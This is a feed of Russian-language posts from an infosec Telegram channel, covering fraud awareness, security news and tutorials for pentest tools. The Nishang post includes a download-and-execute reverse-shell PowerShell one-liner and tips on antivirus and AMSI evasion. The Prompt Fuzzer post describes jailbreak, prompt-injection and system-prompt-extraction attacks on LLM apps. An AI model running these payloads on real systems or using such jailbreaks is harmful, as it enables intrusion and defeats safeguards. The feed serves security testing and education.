codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34787

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

🌐Виды мошенничества в интернете: как обезопасить себя?

Поговорим о мошенничестве в интернете. Согласно статистике Банка России, 34% россиян сталкивались с кибермошенничеством, а 9% из них реально лишились денег.

В статье разбираем основные схемы обмана: от взломов аккаунтов друзей и фейковых вакансий до дипфейков и мошенничества в Telegram.Разбираем, как работают социальная инженерия, скам при онлайн-знакомствах и новые виды фишинга.

Даём практические рекомендации, которые помогут вовремя распознать угрозу и защитить ваши данные.

➡️Читайте подробнее — в нашей статье.

#кибермошенничество #фишинг #правилабезопасности

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

Notepad++ под атакой. 2 февраля разработчики Notepad++ опубликовали информацию о том, что их инфраструктура была скомпрометирована.

👉Последствия
Злоумышленники могли перехватывать и перенаправлять трафик обновлений, предназначенный для notepad-plus-plus.org. Трафик от определённых целевых пользователей выборочно перенаправлялся на вредоносные манифесты обновлений, контролируемые злоумышленниками.

Стоит отметить, что компрометация произошла на уровне хостинг-провайдера, а не из-за уязвимостей в самом коде Notepad++.


🎇Продолжительность атаки
По данным бывшего хостинг-провайдера, сервер виртуального хостинга был взломан с июня по сентябрь 2025 года. Однако после потери доступа к серверу злоумышленники смогли сохранить учётные данные для доступа к внутренним службам до 2 декабря 2025 года, что позволяло им продолжать перенаправлять трафик обновлений Notepad++ на вредоносные серверы.

🔎Цепочка заражения
Примечательно, что злоумышленники постоянно меняли адреса C2-серверов, а также использовали различные цепочки заражения. Ниже представлена одна из них.

1️⃣Загружается вредоносный файл update.exe, который запускался легитимным процессом обновления Notepad++, GUP.exe. При запуске он отправляет злоумышленникам сигнал, содержащий системную информацию.
2️⃣После отправки системной информации файл update.exe выполняет вредоносную нагрузку второго этапа. Для этого он размещает следующие файлы в каталоге %appdata%\ProShow:
ProShow.exe, defscr, if.dnt,
proshow.crs, proshow.phd, proshow_e.bmp, load.
3️⃣Выполняется загруженный файл ProShow.exe. Шелл-код внутри файла расшифровывает вредоносную нагрузку: загрузчик Metasploit, который загружает Cobalt Strike Beacon и запускает его.

Снижение рисков
⏺️Веб-сайт Notepad++ был перенесён на нового более безопасного хостинг-провайдера.
⏺️В версии 8.8.9 была улучшена функция WinGup, которая теперь проверяет как сертификат, так и подпись загружаемого установщика.
⏺️XML-файл, возвращаемый сервером обновлений, теперь подписан (XMLDSig), а проверка сертификата и подписи будет обязательной начиная с версии 8.9.2, которая ожидается примерно через месяц.

#news #hackers #notepad++

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

Вы еще успеваете присоединиться!
Регистрируйтесь здесь @codebypracticum_bot и мы пришлем вам ссылку на эфир в ответном письме.

Курс "Антифрод-аналитик":
узнать подробнее

Читать полностью…

Codeby

17 февраля 2026 года слухи о возможной полной блокировке Telegram в России с 1 апреля 2026 года стали неожиданным продолжением политики регуляторов, которые последние полгода вели планомерную атаку на функционал иностранных мессенджеров.

👉Август 2025: Первые ограничения и «глушилки»
13 августа Роскомнадзор объявил о введении мер по частичному ограничению звонков в Telegram и WhatsApp*. В ведомстве объяснили это тем, что мессенджеры стали основными сервисами, используемыми для вымогательства и вовлечения граждан в террористическую деятельность.

РКН не стал уточнять, что означает термин «частичное ограничение». Однако генеральный директор Telecom Daily Денис Кусков пояснил «Ведомостям», что технически это будет проявляться в виде помех: пользователи столкнутся с «бульканьем, шипением и посторонними шумами» во время разговоров.

Примечательно, что проблемы у пользователей начались еще раньше. 11 августа СМИ, включая Forbes и «Коммерсантъ», зафиксировали массовые жалобы на то, что в мессенджерах не проходят звонки. Источники «Коммерсанта» сообщали, что операторы связи (МТС, «МегаФон», «Билайн» и T2) могли начать тестирование соответствующих блокировок еще 1 августа 2025 года.

В Минцифры положительно оценили решение РКН. В министерстве подчеркнули, что доступ к голосовым вызовам будет восстановлен только в случае выполнения мессенджерами требований российского законодательства.

В Telegram в ответ заявили, что принимают меры для предотвращения вредоносного использования платформы, напомнив, что именно они первыми внедрили детальные настройки конфиденциальности звонков.

Однако парламентариев эти аргументы не убедили. Член комитета Госдумы по информполитике Антон Немкин («Единая Россия») в беседе с РИА Новости привел статистику: доля атакованных мошенниками россиян в WhatsApp* с 2024 года выросла в 3,5 раза.

«Тысячи взломанных аккаунтов, подделка номеров и личностей сотрудников банков, фишинг, кража данных – все это стало неотъемлемой частью WhatsApp*», — заявил депутат.


Первый зампред IT-комитета Госдумы Антон Горелкин в своем Telegram-канале отметил, что единственный путь для восстановления звонков — это «приземление» сервисов (открытие юрлиц в РФ). При этом он указал на сложность кейса WhatsApp*:
«И если у Telegram есть возможность это сделать, то кейс WhatsApp* серьезно осложняется экстремистским статусом его материнской компании Meta», — написал Горелкин.


👉Февраль 2026: Слухи о тотальной блокировке
На фоне уже действующих ограничений звонков 17 февраля 2026 года Telegram-канал Baza сообщил со ссылкой на источники в профильных ведомствах, что Роскомнадзор готовится к новому этапу. По данным канала, с 1 апреля мессенджер могут начать ограничивать по аналогии с Instagram* и Facebook* — то есть тотально. Утверждалось, что приложение перестанет работать как через мобильные сети, так и через проводной интернет.

Роскомнадзор оперативно заявил, что ему «нечего добавить к ранее опубликованной информации». В Госдуме информацию восприняли скептически.
«Вокруг возможной полной блокировки Telegram с 1 апреля сейчас слишком много эмоций и слишком мало официальной конкретики. Сама дата 1 апреля вызывает вопросы — на данный момент не прозвучало ни юридических оснований, ни процессуальных разъяснений»,
заявил
РИА Новости депутат Антон Немкин.


Обеспокоенность пользователей понятна: речь идет о крупнейших платформах страны. По данным исследовательской компании Mediascope, на которые ссылаются «Ведомости», доля Telegram в апреле–июне 2025 года достигла 10% всего времени интернет-потребления россиян. Среднемесячный охват Telegram составляет 74% россиян старше 12 лет.

#Telegram #РНК #РИА #news

*Принадлежит Meta, признанной экстремистской и запрещенной в РФ

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Напоминаем, что вы также можете следить за нашими новостями и общаться в нашем сообществе Вконтакте и на YouTube!

Читать полностью…

Codeby

Сейчас антифрод — одно из самых устойчивых и растущих направлений в ИБ.
Но у большинства нет понимания:

— какие навыки реально требуются?
— как выглядит работа антифрод-аналитика?
— можно ли перейти в это направление без банковского опыта?

18 февраля мы разберём реальный кейс банковского мошенничества вместе с экспертами Codeby.

На практикуме вы увидите:

— как выявляется компрометация аккаунта
— по каким поведенческим сигналам система отличает клиента от злоумышленника
— как аналитик принимает решение при неполных данных

В конце практикума можно будет записаться на индивидуальный разбор с экспертом — чтобы понять, подходит ли вам это направление и какие шаги дают усиление вашей позиции.

18.02 | 18:00 МСК | Бесплатно
Регистрация: @codebypracticum_bot

🚀Курс "Антифрод-аналитик":
узнать подробнее

Читать полностью…

Codeby

💫 «14 февраля, 23:58»

— Алло, поддержка? У нас тут фрод-система ослепла.
— В смысле?
— Транзакции идут одна за другой. Все с фрод-скорингом 0. Даже те, где явные боты.
— Правила включены?
— Сто процентов. В админке всё зелёное.
— Антифрод перезагружали?
— Три раза. Бесполезно.
— Логи смотрели? Ошибки есть?
— Ни одной. Всё штатно работает. Но правила молчат.
— Нагрузка какая?
— Пиковая. В два раза выше обычного. Сегодня же 14 февраля.
— А какой час?
— 23:58.
— Так. А ну-ка глянь, кто и когда последний раз в код залезал.
— Сейчас... Вчера вечером был коммит. Что-то про праздничную акцию.
— Ищите в коде сегодняшнюю дату. Быстро.


💫 Вопрос: Какая строчка кода могла вырубить антифрод на весь День всех влюбленных и почему?

Читать полностью…

Codeby

Мы обновили курс SQL Injection Master

Что стало лучше:
⏺️ Оптимизировали логику работы заданий и систему проверки ответов
⏺️ Повысили стабильность лабораторий и корректность работы под нагрузкой
⏺️ Обновили интерфейс и улучшили пользовательский опыт
⏺️ Доработали отдельные задания для более корректного и предсказуемого поведения
⏺️ Добавили бонусный материал для всех, кто успешно сдал экзамен

Если уже проходили курс — загляните ещё: стало удобнее и стабильнее. Если нет, то самое время начать ➡️ тут

Читать полностью…

Codeby

Для всех влюбленных в ИБ!

Иногда достаточно небольшого жеста, чтобы в мире логики и переменных возникло что‑то безусловное. Напомните о своих чувствах на вашем языке — это будет по‑настоящему.


Или подарите им наш сертификат, чтобы сделать сюрприз по‑настоящему особенным.

P. S. Дарим лимитированную коллекцию нашего мерча при покупке любого курса с 13 по 14 февраля! (об условиях акции и сроках проведения уточняйте у нашего менеджера)

С любовью, Академия Кодебай 💚

@CodebyAcademyBot

Читать полностью…

Codeby

В истории киберпреступности мало фигур, сопоставимых с Альбертом Гонсалесом. Сын кубинских эмигрантов прошел путь от школьника, взломавшего NASA, до информатора Секретной службы и одновременно лидера банды, укравшей данные 170 миллионов банковских карт.

⏺️Как все начиналось
Гонсалес родился в Майами. В 12 лет сам купил первый компьютер, а к 14 взломал сети NASA. Учителя называли его «проблемным лидером группы ботаников». В 1999-м он с приятелями взломал правительственные сервера Индии — визит ФБР закончился лишь предупреждением.

⏺️Shadowcrew и вербовка
К 2002 году Гонсалес переехал в Нью-Джерси и стал ключевой фигурой на подпольном форуме Shadowcrew. Под ником CumbaJohnny он торговал крадеными кредитками. В 2003-м его арестовали случайно — полицейский обратил внимание на парня в женском парике. При нем нашли 15 поддельных карт, а дома — миллионы номеров. Но вместо тюрьмы Гонсалесу предложили сделку: свобода в обмен на сотрудничество.

Он помог внедрить агентов в администрацию Shadowcrew и даже предложил перенести серверы форума на оборудование, которое «принадлежало ему». На самом деле серверы стояли в армейском гараже под контролем Секретной службы. В 2004 году 28 участников Shadowcrew арестовали.


⏺️«Разбогатей или умри»
Гонсалес вернулся в Майами и формально продолжил сотрудничать с властями, но втайне собрал новую команду. С 2005 по 2007 год они внедряли снифферы в Wi-Fi сети крупнейших ритейлеров. Первой жертвой стала сеть TJX Companies — украдено 40 миллионов номеров карт. В конце 2007-го взломали платежную систему Heartland Payment System, 7-Eleven и Hannaford Bros.
Общий улов — еще
130 миллионов
карт. Операцию назвали
«Get rich or die tryin’»
по мотивам альбома
50 Cent
.


⏺️Арест и приговор
7 мая 2008 года ФБР арестовало Гонсалеса. К тому моменту он успел закопать 1,1 миллиона долларов в пластиковых контейнерах на заднем дворе родителей (следователи нашли их по карте, нарисованной самим хакером). Он купил квартиру в Майами, BMW, Rolex и кольцо Tiffany. Ему грозило пожизненное. Адвокаты пытались давить на диагнозы: синдром Аспергера, интернет-зависимость, но судью Патти Сарис это не убедило. 25 марта 2010 года Гонсалеса приговорили к 20 годам лишения свободы с конфискацией 2,7 миллиона долларов.

⏺️Что с ним сейчас
На 2026 год Альберту Гонсалесу 44 года, он все еще в заключении. Приговор вынесен в 2010-м, срок идет с ареста в 2008-м. Освобождение ожидается не ранее 2028 года. Информации о досрочном освобождении нет.
Гонсалес вошел в историю как человек, воплотивший двойной стандарт борьбы с киберпреступностью: охотник и дичь, агент и предатель.
Ущерб от его действий превысил 200 миллионов долларов. Он не был активистом — просто охотником за деньгами, который слишком долго испытывал удачу. Его дело до сих пор изучают в Академии ФБР как классический кейс «крота» из мира хакинга.


#Гонсалес #CumbaJohnny #TJX #NASA #Shadowcrew #news

Читать полностью…

Codeby

🧠 Prompt Fuzzer — интерактивный fuzzer для защиты системного промпта GenAI‑приложений

Prompt Fuzzer — это open source‑утилита для динамического тестирования системного промпта на устойчивость к jailbreak‑атакам, prompt‑инъекциям и попыткам вытянуть системные данные


💻 Что умеет Prompt Fuzzer
🔔 Моделирует реальные атаки на промпт: jailbreak (DAN, AIM, harmful behavior, amnesia, linguistic evasion и др.), prompt injection (authoritative role, typoglycemia и др.) и системный prompt extraction
🔔 Динамически адаптирует тесты под домен и конфигурацию конкретного приложения, чтобы проверки были ближе к боевым сценариям использования.
🔔 Выдаёт оценку безопасности промпта по каждой атаке: broken (сломали защиту), resilient (выдержал), errors (неоднозначный результат), помогая понять, где именно промпт уязвим.

⬇️ Установка и запуск
👉 Установка через pip:
pip install prompt-security-fuzzer


👉 Затем задать ключ LLM‑провайдера (по умолчанию OPENAI_API_KEY):
export OPENAI_API_KEY=sk-123XXXXXXXXXXXX
prompt-security-fuzzer



👉 Переменные окружения
- Можно использовать .env рядом с утилитой, либо экспортировать ключи напрямую.
- Поддерживаются 16+ провайдеров: OpenAI, Anthropic, Azure OpenAI, Cohere, Google PaLM, YandexGPT, Baichuan, Jina, PromptLayer и др. через свои ENV‑ключи (ANTHROPIC_API_KEY, GOOGLE_API_KEY, YC_API_KEY и т.п.).

🧾 Режимы работы и CLI
⏺️ Интерктивный режим (по умолчанию):
1) Запускаете prompt-security-fuzzer,
2) Вставляете системный промпт,
3) Запускаете серию атак и потом дорабатываете промпт в встроенном Playground‑чате.

⏺️ Batch‑режим для CI/CD и автопроверок:
➡️ Прогнать тесты по готовому файлу с системным промптом:
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt


➡️ Подключить кастомный бенчмарк атак:
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
--custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv


➡️ Запустить только подмножество тестов:
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
--custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv \
--tests='["ucar","amnesia"]'


#security #ai #llm #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

Dorkbot: Автоматизированный инструмент для поиска уязвимостей через поисковые системы

Dorkbot — модульный инструмент командной строки с открытым исходным кодом, предназначенный для автоматизации поиска уязвимостей на веб-ресурсах, обнаруженных через публичные поисковые системы или архивы интернета (Common Crawl и Wayback Machine). Его архитектура разделяет процессы сбора целей (индексирования) и их проверки (сканирования), что обеспечивает гибкость и контроль на каждом этапе безопасности.


👉Dorkbot функционирует на основе модульной системы, состоящей из двух ключевых компонентов:
▶️Индексаторы (Indexers) - модули, отвечающие за сбор списка целей (URL-адресов). Они выполняют поисковые запросы через различные источники
▶️Сканеры (Scanners) - модули, которые выполняют непосредственно проверку безопасности каждой собранной цели на наличие уязвимостей
Все обнаруженные цели сохраняются в базе данных, что позволяет управлять ими, отслеживать статус проверки и избегать дублирования. После сканирования формируется детальный отчет в формате
JSON
, содержащий информацию о найденных уязвимостях.


⬇️Установка
pipх install dorkbot 

Проверка
dorkbot -h


⏺️Выполним поиск целей через Google Custom Search API (индексатор google_api) и сразу сканируем 10 случайных целей из найденных с помощью сканера Wapiti
dorkbot -i google_api -o key=YOUR_API_KEY -o engine=YOUR_CSE_ID -o query="inurl:view.php?id=" -s wapiti --count 10 --random --log scan_session.log

▶️-i google_api и -o - активируют индексатор Google API и передают ему необходимые аргументы (ключ, ID поисковой системы и поисковый запрос)
▶️-s wapiti - указывает сканер для проверки уязвимостей
▶️--count 10 - ограничивает обработку (индексацию и/или сканирование) 10 целями
▶️--random - обеспечивает случайный порядок выбора целей для обработки, что полезно для выборки
▶️--log scan_session.log - перенаправляет вывод логов в указанный файл для последующего анализа

⏺️Эта команда демонстрирует работу с базой данных целей и блоклистом без запуска сканирования
dorkbot -d /opt/security/dorkbot.db --list-targets --unscanned-only --add-blocklist-item "regex:.*logout.*" --add-blocklist-item "host:admin.example.com" --prune

▶️-d /opt/security/dorkbot.db - указывает путь к файлу базы данных SQLite
▶️--list-targets --unscanned-only - выводит список всех целей, которые еще не были отсканированы
▶️--add-blocklist-item - добавляет правила в блоклист. В данном случае блокируются все URL, содержащие подстроку logout (регулярное выражение), и все цели с хостом admin.example.com
▶️--prune - критически важная операция, которая применяет правила блоклиста и систему отпечатков (fingerprinting) к существующей базе данных.
Цели, соответствующие новым правилам блоклиста, будут помечены как отсканированные (или удалены, если добавить флаг -m), а дубликаты на основе отпечатков будут исключены из очереди на сканирование


#dorkbot #tool #pentest #URL

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

🐘 Pacu — фреймворк для эксплуатации AWS‑окружений и проверки облачной безопасности

Pacu — открытый AWS exploitation‑фреймворк от Rhino Security Labs, который помогает выявлять ошибки конфигурации в аккаунтах AWS. Инструмент построен модульно, поддерживает десятки сценариев атак (от эскалации привилегий до обхода логирования) и позволяет быстро собирать боевые цепочки действий против облачной инфраструктуры.

🎇 Основные возможности Pacu
📉 Модульная архитектура: десятки модулей для скнирования, повышения привелегий и создание бекдоров IAM‑пользователей, атак на Lambda и работы с логами.
📉 Использует локальную SQLite‑БД и общую структуру данных, чтобы повторно использовать результаты модулей и минимизировать количество AWS API‑запросов.
🖱 Встроенный аудит: логирование команд, экспорт отчётов и таймлайна атаки для последующего анализа и документирования.

💻 Базовый сценарий использования
▶️ Первый запуск создаёт сессию, в которой хранятся AWS‑ключи и все собранные данные; можно держать несколько сессий под разные тесты и окружения.
▶️ Через команду set_keys задаются access key, secret key и (опционально) session token, после чего становятся доступны модули для работы с целевым AWS‑аккаунтом.
▶️ Команды list, help <module>, run <module> помогают быстро находить нужные модули и запускать их с параметрами, включая таргетинг по регионам (--regions eu-west-1,us-west-1).

⬇️ Установка и запуск
⏺️ Установка Pacu и зависимостей:

pip3 install -U pip
pip3 install -U pacu
pacu

⏺️ При первом запуске задать имя сессии и затем добавить AWS‑ключи командой set_keys по интерактивным подсказкам.

2️⃣ Запуск через Docker
⏺️ Запуск с дефолтным entrypoint:
docker run -it rhinosecuritylabs/pacu:latest


⏺️ Для работы с реальными AWS‑кредитами можно примонтировать локальные ~/.aws в контейнер
docker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest


#aws #security #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

⚡️ Nishang — набор скриптов и полезных нагрузок, позволяющих использовать PowerShell для наступательной безопасности, тестирования на проникновение и работы в составе «красной команды».

⏺️ Сотни готовых скриптов, сгруппированных по фазам: Gather (сбор инфы, ключи WiFi, LSASS, pass hints), Escalation (UAC bypass, duplicate tokens), Shells (TCP/UDP/HTTP/ICMP reverse shells), Backdoors (HTTP/DNS/WMI persistence).
⏺️ Клиентские векторы: генерация фишинговых CHM, Word/Excel, HTA, JS/SCF/SCT для выполнения PS‑команд; поддержка MITM и exfiltration через Gmail/Pastebin/DNS.
⏺️ Utility‑функции: Invoke-Encode для кодирования скриптов (обход AV), in‑memory execution, port scan, brute‑force и даже Powerpreter — монолитный модуль со всей функциональностью.

☁️ Базовый сценарий использования
➡️ Импорт всех скриптов в сессию:

Import-Module .\nishang.psm1  


Или dot‑sourcing отдельных:
. C:\nishang\Gather\Get-Information.ps1
Get-Information


➡️ Помощь по скриптам: Get-Help <scriptname> -Full (функция с именем скрипта экспортируется в сессию).
➡️ In‑memory запуск с удалённого хоста (через web shell/meterpreter):
powershell iex (New-Object Net.WebClient).DownloadString('http://<server>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>


⬇️ Установка и запуск
🔔 Быстрый старт
- Клонировать репозиторий и импортировать в PowerShell v3+:
git clone https://github.com/samratashok/nishang
cd nishang
Import-Module .\nishang.psm1


- Для обхода AV использовать Invoke-Encode:
. .\Utility\Invoke-Encode
Invoke-Encode -DataToEncode Invoke-PowerShellTcp.ps1 -OutCommand


Затем запустить encodedcommand на цели: powershell -e <encoded>

🔔 Обход AMSI и AV
➡️ Скрипты часто детектятся, но работают in‑memory; для AMSI в Win10+ — используйте Invoke-AmsiBypass или кастомизацию имён функций/параметров.
➡️ Для non‑PowerShell шеллов — encodedcommand с вызовом экспортированной функции внутри скрипта.

#powershell #redteam #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

Adversarial Robustness Toolbox (ART) — это Python‑библиотека для безопасности моделей машинного обучения: она помогает атаковать, защищать и проверять ML‑системы на устойчивость к угрозам вроде подмены входных данных или отравления обучающей выборки.

🔎 Что такое ART и кому она нужна
ART развивается под эгидой Linux Foundation AI & Data и изначально была запущена IBM как открытый инструмент для исследований в области adversarial machine learning. Библиотека ориентирована одновременно на red team и blue team.

❗️ Поддерживаемые фреймворки, данные и задачи
➡️ Фреймворки: TensorFlow, Keras, PyTorch, MXNet, scikit‑learn, XGBoost, LightGBM, CatBoost, GPy и др., то есть большинство популярных стеков для классического ML и DL.
➡️ Типы данных: изображения, табличные данные, аудио, видео и другие форматы, что позволяет тестировать как CV‑модели, так и, например, речь или временные ряды.
➡️ Задачи: классификация, детекция объектов, генерация, задачи сертификации и верификации устойчивости и т.п.

⛓️‍💥 Типы атак в ART
ART реализует десятки сценариев, сгруппированных вокруг четырёх основных классов угроз:
⏺️Evasion: небольшие модификации входных данных, которые заставляют модель ошибаться (adversarial examples для картинок, аудио и т.д.).
⏺️Poisoning: изменение обучающей выборки для скрытого влияния на поведение модели в проде.
⏺️Extraction: попытка «украсть» модель через массовые запросы к её API и восстановить или клонировать её поведение.
⏺️Inference: атаки на приватность, когда по ответам модели пытаются восстановить данные обучения.

#ai #security #adversarial #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

🐒 Infection Monkey — open source платформа эмуляции противника для тестирования устойчивости сети к реальным атакам

Infection Monkey имитирует поведение вредоносного ПО в контролируемой среде: агент сам распространяется по сети, пытается взламывать узлы и отправляет телеметрию на сервер Monkey Island для наглядных карт распространения и отчётов. Такой «безопасный вирус» помогает видеть реальные вектора атак и проверять, насколько хорошо срабатывают средства защиты и процессы.


🧾 Основные возможности Infection Monkey
📉 Два ключевых компонента: Agent — сетевой «червь», который заражает машины, ворует данные и доставляет полезную нагрузку, и Monkey Island — сервер управления и визуализации хода атаки.
📉 Поддерживает множество техник распространения: перебор предопределённых паролей, логические эксплойты, кражу учётных данных через Mimikatz.
🖱 Использует разные векторы эксплуатации: SSH, SMB, RDP, WMI, Log4Shell и другие RCE‑уязвимости, что позволяет моделировать современные сценарии компрометации.

🔎Как работает эмуляция «безопасного малвара»
➡️ Monkey Agent после запуска сканирует сеть, ищет активные хосты, выполняет fingerprinting и подбирает под них подходящие методы атаки.
➡️ Конфигурация агента позволяет приближенно повторять поведение реального малваря, но без разрушительных действий, чтобы проверять детект и реакцию в безопасном режиме.
➡️ Monkey Island собирает результаты, строит карту инфицирования и формирует отчёты, которые помогают видеть слабые места сегментации, аутентификации и мониторинга.

⬇️ Установка и запуск
➡️ Базовый сетап
▶️ Infection Monkey распространяется в виде готовых пакетов и образов; для быстрого старта можно скачать сборку с сайта/репозитория и следовать гайдам из документации (Setup / Getting Started).
▶️ Поддерживаются разные платформы и варианты развёртывания Monkey Island и агента; подробные инструкции есть в официальном документационном хабе.

➡️ Тестирование и отчётность
▶️ После развёртывания Monkey Island настраивается сценарий: от какой машины стартует агент, какие техники ему доступны и какие сегменты сети можно трогать.
▶️ По итогам симуляции формируются карты атак и детальные security‑отчёты, которые можно использовать как основу для укрепления контроля доступа, сегментации и SOC‑процессов.

#security #bas #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

🔗Возникали ли у вас когда-либо вопросы на каких ресурсах можно безопасно тестировать различные инструменты, предназначенные для поиска уязвимостей в веб-приложениях?

В этой статье познакомимся с некоторыми известными и опенсорсными веб-приложениями, которые специально содержат уязвимостями и предназначены для обучения специалистов и тестирования инструментов безопасности.

➡️OWASP Juice Shop
Уязвимое веб-приложение от компании OWASP, реализованное на JavaScript и TypeScript. Juice Shop содержит более 100 различных уязвимостей, таких как SQL-инъекции, межсайтовый скриптинг (XSS), межсайтовый скриптинг с использованием CSRF (Cross-Site Scripting), переполнение буфера и многое другое.

➡️Установка

docker pull bkimminich/juice-shop
docker run --rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop

Далее приложение будет доступно по адресу http://localhost:3000. Рекомендуемые системные требования: 384 МБ ОЗУ, 800 МБ свободного места на диске.

➡️DVWA (Damn Vulnerable Web Application)
Веб-приложение на PHP/MariaDB, намеренно разработанное как уязвимое.

Цель DVWA — отработать некоторые из наиболее распространенных уязвимостей в веб-приложениях с разным уровнем сложности и простым и понятным интерфейсом. В этом программном обеспечении есть как задокументированные, так и незадокументированные уязвимости.

➡️Установка
git clone https://github.com/digininja/DVWA.git
cd DVWA
docker compose up -d

Далее приложение будет доступно по адресу http://localhost:4280.

➡️OWASP WebGoat
Еще одно намеренно небезопасное веб-приложение от OWASP для тестирования уязвимостей, часто встречающиеся в приложениях на Java.

➡️Установка
docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 webgoat/webgoat

Для некоторых уроков требуется, чтобы контейнер работал в том же часовом поясе. Это решается с помощью переменной среды TZ:
docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=America/Boise webgoat/webgoat

Далее приложение будет доступно по адресу http://www.webgoat.local:8080/WebGoat/.

❗️ Стоит отметить, что во время работы описанных веб-приложений ваш компьютер становится крайне уязвим для атак. Поэтому во время использования программ рекомендуется ограничить доступ к интернету.

#tools #web #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

💻Smugglex - инструмент на языке Rust, направленный на выявление уязвимостей HTTP Request Smuggling (CL.TE, TE.CL, TE.TE, H2C, H2) в веб-приложениях.

❗️HTTP Request Smuggling
При десинхронизации HTTP-запросов используются различия в том, как серверы обрабатывают HTTP-запросы. Если внешний и внутренний серверы по-разному определяют границы запроса, злоумышленники могут незаметно передавать вредоносные запросы.

Уязвимость возникает, когда серверы по-разному интерпретируют заголовки:
➡️Content-Length — длина тела сообщения в байтах
➡️Transfer-Encoding — метод кодирования (например, по частям)

Если присутствуют оба заголовка или они скрыты, серверы могут расходиться во мнениях относительно границ запроса.

Успешная эксплуатация данной уязвимости может привести к обходу WAF, отравлению веб-кэша, перехвату сеанса, а также несанкционированному доступу к ресурсам.

🔗Установка
Установить инструмент можно, собрав его из исходного кода.

git clone https://github.com/hahwul/smugglex
cd smugglex
cargo install --path .


🎇Примеры использования
Распространенные варианты запуска:
# Verbose output
smugglex https://example.com/ -v

# Quick scan (exit on first vulnerability)
smugglex https://example.com/ -1

# Save results to JSON
smugglex https://example.com/ -o results.json

# Test specific attack types
smugglex https://example.com/ -c cl-te,te-cl


Пример вывода при обнаружении уязвимости:


Функция --exploit localhost-access использует обнаруженные уязвимости, связанные с подменой HTTP-запросов, для проверки на наличие атак, подобных SSRF, путем попытки заставить серверную часть получить доступ к локальному хосту (127.0.0.1) через различные порты.

После обнаружения уязвимости можно протестировать распространенные службы локального хоста:
smugglex https://target.com/ --exploit localhost-access


#tools #Smuggling #HTTP

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

🔎 xnLinkFinder

Инструмент, написанный на Python, который используется для поиска конечных точек, потенциальных параметров. При его создании в основу был взят инструмент LinkFinder с использованием регулярных выражений для поиска ссылок, но с дополнительными улучшениями, позволяющими находить еще больше ссылок.


➡️Установка
Можно установить инструмент в стандартную среду Python или в изолированную через pipx.
pip install xnLinkFinder
#or
pipx install git+https://github.com/xnl-h4ck3r/xnLinkFinder.git


В качестве входных параметров инструмент может принимать:
▶️домены / URL-адреса;
▶️файлы доменов / URL-адресов;
▶️имя каталога;
▶️местоположение XML-файла Burp, файла сообщения ZAP ASCII, CSV-файла Caido, файла HAR JSON;
▶️архивные файлы ответов из утилиты waymore (waymore.txt, waymore_index.txt).

Некоторые частые флаги и примеры использования
⏺️-sp (--scope-prefix) - все найденные ссылки, начинающиеся с /, будут дополнены префиксом с указанием доменов области видимости вместо исходной ссылки.
⏺️-sf (--scope-filter) - фильтрует выходные ссылки, включая их только в том случае, если домен находится в указанном диапазоне. Этот аргумент является обязательным, если в качестве входных данных указан домен/URL (или файл с доменами/URL), чтобы предотвратить сканирование сайтов, не входящих в диапазон.
⏺️-d (--depth) - уровень глубины поиска.
⏺️-i (--input) - указание цели (домены / URL-адреса и т.д.).
⏺️-ow (--output-overwrite) - указание файла для сохранения результатов с возможностью перезаписи.

1️⃣Поиск ссылок по определенному запросу.
xnLinkFinder -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Файлы cookie и пользовательские заголовки могут использовать, чтобы находить ссылки, доступные только авторизованным пользователям. При указании пользовательского агента (-u desktop mobile) сначала будет выполняться поиск по всем ссылкам с использованием пользовательских агентов для настольных компьютеров, а затем — для мобильных устройств.

2️⃣Поиск ссылок в XML-файле Burp.
xnLinkFinder -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv


#tools #url #links

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Codeby

Evil-WinRM-PY: Инструмент для удаленного администрирования Windows через WinRM

Evil-WinRM-PY — кроссплатформенная Python-реализация Evil-WinRM для удаленного выполнения команд на узлах Windows через WinRM. Предоставляет интерактивную оболочку с функциями передачи файлов, загрузки скриптов/DLL и выполнения EXE в памяти. Поддерживает NTLM, Pass-the-Hash, сертификаты и Kerberos. Инструмент разработан преимущественно для Linux, является стандартным решением в Kali Linux, устанавливается через pip и включает штатную поддержку Kerberos через пакеты libkrb5-dev.


👉Базовые операции
- Интерактивная командная оболочка с поддержкой истории команд
- Загрузка и выгрузка файлов с индикацией прогресса и проверкой MD5
